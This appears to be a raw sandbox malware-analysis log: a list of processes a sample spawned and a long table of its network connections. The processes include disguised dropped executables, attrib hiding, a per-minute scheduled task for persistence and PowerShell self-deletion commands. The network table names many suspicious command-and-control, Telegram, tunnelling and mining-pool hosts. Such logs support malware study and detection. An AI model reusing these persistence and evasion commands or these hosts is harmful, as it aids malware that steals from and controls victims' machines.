C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7656 -ip 7656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7656 -s 1312
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.137:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.89:80 | e5.o.lencr.org | tcp |
| RU | 89.169.1.136:443 | tcp | |
| RU | 178.215.69.22:21 | tcp | |
| RU | 89.169.41.151:1723 | tcp | |
| RU | 89.169.41.158:80 | tcp | |
| RU | 89.169.41.242:80 | tcp | |
| RU | 178.215.78.25:23 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 120.250.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 101.99.92.189:8080 | tcp | |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:63170 | tcp | |
| N/A | 127.0.0.1:63267 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 212.129.32.142:9001 | tcp | |
| US | 8.8.8.8:53 | 142.32.129.212.in-addr.arpa | udp |
| IT | 87.120.237.130:9001 | tcp | |
| CZ | 37.46.211.15:443 | tcp | |
| US | 8.8.8.8:53 | 130.237.120.87.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 45.155.249.199:80 | 45.155.249.199 | tcp |
| US | 8.8.8.8:53 | wodresomdaymomentum.org | udp |
| US | 8.8.8.8:53 | 199.249.155.45.in-addr.arpa | udp |
| NL | 78.41.139.3:4000 | wodresomdaymomentum.org | tcp |
| NL | 78.41.139.3:4739 | wodresomdaymomentum.org | tcp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | 3.139.41.78.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 104.21.73.97:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 104.21.85.189:443 | ipbase.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 97.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.85.21.104.in-addr.arpa | udp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 92.205.17.128:9001 | tcp | |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| US | 8.8.8.8:53 | 128.17.205.92.in-addr.arpa | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 104.21.22.222:443 | immureprech.biz | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 222.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.96.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 8.8.8.8:53 | 1.96.21.104.in-addr.arpa | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 136.63.122.92.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| DE | 13.32.121.112:80 | updates.signiant.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 112.121.32.13.in-addr.arpa | udp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 13.248.156.178:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 178.156.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| US | 2.21.72.81:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | 81.72.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.17.90:80 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 80.82.65.70:80 | 80.82.65.70 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 70.65.82.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| FR | 172.217.18.206:443 | youtube.com | tcp |
| FR | 172.217.18.206:443 | youtube.com | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| FR | 172.217.18.206:443 | youtube.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| FR | 142.250.178.142:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| FR | 142.250.179.110:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| FR | 142.250.179.110:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | 206.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.93.85.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.179.250.142.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 195.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 95.173.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 164.20.217.172.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
